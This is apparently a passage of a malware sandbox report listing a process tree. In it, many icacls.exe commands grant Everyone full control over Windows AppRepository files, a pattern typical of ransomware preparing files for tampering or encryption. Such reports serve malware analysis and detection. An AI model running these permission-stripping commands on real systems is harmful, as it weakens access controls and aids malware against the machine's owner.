  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11220
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13212
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:18024
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:18020
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11336
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_2019.16112.11621.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5508
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5532
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11756
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14616
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14656
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_2019.16112.11601.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16264
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd /grant Everyone:F /T /C /Q
  2⤵
  PID:8424
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd-shm /grant Everyone:F /T /C /Q
  2⤵
  PID:15000
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd-wal /grant Everyone:F /T /C /Q
  2⤵
  PID:11284
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Machine.srd /grant Everyone:F /T /C /Q
  2⤵
  PID:6356
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-shm /grant Everyone:F /T /C /Q
  2⤵
  PID:3156
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-wal /grant Everyone:F /T /C /Q
  2⤵
  PID:18192
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4220
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4236
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4728
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6304
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:4120
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:4244
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:12268
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:2208
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:4032
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:1576
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:4476
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:16768
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:1792
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:1224
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:5084
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:16588
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:16484
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:592
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:2120
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:4376
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:8040
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:14148
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:3320
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:18376
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:2224
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:2384
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:3952
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:3576
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:1636
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:4820
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:3600
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2140
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:1088
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:2136
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:2304
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:4524
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:2152
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:4084
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:16052
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:12704
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:5168
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:12376
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5396
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:7600
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:3692
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:8400
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:14500
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:14548
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:7692
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:14780
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:16792
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:6476
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:14868
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:11244
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:7416
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:16756
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:16624
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:11192
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:17056
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:16680
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:16192
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:11224
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:15972
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:8168
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:13924
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:16112
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.WindowPicker_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:14412
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.WindowPicker_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:8808
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.WindowPicker_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:17844
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.WindowPicker_10.0.15063.0_neutral__cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:12408
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ShellExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:18036
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ShellExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:12392
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ShellExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:17020
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ShellExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:9132
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecureAssessmentBrowser_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:2576
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecureAssessmentBrowser_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:4872
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecureAssessmentBrowser_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:2672
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecureAssessmentBrowser_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:2744
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:14612
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:15068
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:6884
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:6024
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:6632
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:5836
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5224
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:12932
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral__cw5n1h2txyewy\S-1-5-21-941723256-3451054534-3089625102-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:14900
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
